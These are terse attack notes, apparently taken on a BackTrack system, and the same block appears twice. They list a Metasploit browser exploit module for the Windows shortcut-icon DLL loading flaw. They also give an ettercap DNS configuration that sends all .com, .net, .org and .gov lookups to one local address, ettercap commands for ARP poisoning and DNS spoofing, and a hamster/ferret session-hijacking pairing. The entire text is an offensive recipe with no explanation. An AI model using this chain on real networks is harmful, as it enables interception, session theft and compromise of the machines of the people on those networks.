Commands:
exploit in MSF: windows/browser/ms10_046_shortcut_icon_dllloader
etter.dns:
root@bt:/usr/share/ettercap# cat etter.dns
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133
ettercap command: ettercap -T -q -i eth0 -P dns_spoof // //
ettercap -T -Q -i wlan3 -M arp -P dns_spoof // //
hamster+ettercap-farret
exploit in MSF: windows/browser/ms10_046_shortcut_icon_dllloader
etter.dns:
root@bt:/usr/share/ettercap# cat etter.dns
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133
ettercap command: ettercap -T -q -i eth0 -P dns_spoof // //
ettercap -T -Q -i wlan3 -M arp -P dns_spoof // //
hamster+ettercap-farret